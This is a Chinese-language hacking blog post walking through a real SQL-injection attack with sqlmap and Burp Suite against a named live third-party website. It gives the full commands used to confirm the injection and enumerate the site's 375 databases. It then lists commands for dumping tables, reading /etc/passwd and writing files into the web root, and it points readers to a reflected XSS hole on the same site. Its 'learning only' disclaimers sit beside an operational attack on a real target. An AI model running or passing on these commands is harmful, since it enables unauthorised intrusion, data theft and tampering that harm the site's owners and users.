X黑手网
X黑手网
X黑手网
实战!!!使用sqlmap进行sql注入

实战!!!使用sqlmap进行sql注入

前言

进入正题前!!!!!禁止破坏!!!!插播广告!!!(物色天命主角,有意者请联系作者,作者24小时工作)

使用工具: 

  • 1.sqlmap
  • 2.burpsuite

目标:

https://bz.u2006.com/HYX10764/mater.php?id=5

ps–  !!!真实站点,请勿搞破坏如有不然,本人概不负责。仅供学习交流!!!

使用sqlmap前明确目标。使用前,手工注入测试,测试感觉有注入点直接上工具。

使用指令: 

python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5

微信截图_20240626004352

这里提示我们无法建立ssl连接,ssl具体是什么咱就不过谈论。无法建立连接,我采用的办法是通过走burpsuite的代理来解决,当然也还有其他办法咱不过谈论!!

接着我们使用参数–force-ssl这里是告诉我们的sqlmap这是htpps服务,然后在使用–proxy指定代理

全部指令如下:

python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080

 !!注意这里的地址和端口要和burpsuite一样。

如图:

3

中途要是询问y/n直接一路y就好了懒一点的话可以再指令后面加上–batch参数,表示一切默认执行。第一次扫描时间比较长请耐心等待

如出现如图:

5

表示注入方式有三种,咱就一般也不管。反正有就行了,有注入点,那就好办了。

直接输入指令: 

sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080 --dbs 查看所有库名

微信截图_20240625210726

这里显示库有375个,至此咱就结束了爆出库名就行,仅做研究!!!一切违法行为与本人无关!!!

我给兄弟们总结了一下常用参数:

  • -purge清楚缓存重新跑
  • sqlmap -u <目标URL> –banner 查看数据库版本
  • sqlmap -u <目标URL> –dbs 查看可以使用的数据库名
  • sqlmap -u <目标URL> –current-user 查看当前用户
  • sqlmap -u <目标URL> –current-db 获取当前数据库名称
  • sqlmap -u <目标URL> –banner 查看数据版本
  • sqlmap -u <目标URL> –tables -D <数据库名称> 获取指定数据库下的表
  • sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> 获取表中的数据
  • sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> -o <输出文件名> 下载表里面的内容到指定位置
  • sqlmap -u <目标URL> –columns -D <数据库名称> -T <表名> 获取指定数据库下面的表的字段
  • sqlmap -u <目标URL> –file-read “/etc/passwd” 查看网站目录文件
    sqlmap -u <目标URL> –file-write /test/test.txt –file-dest /var/www/html/1.txt写入网站目录文件

!!!!禁止破坏!!!!

后记练手小项目

此上网站存在xss反射型漏洞,有兴趣自行研究,禁止破坏!!

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容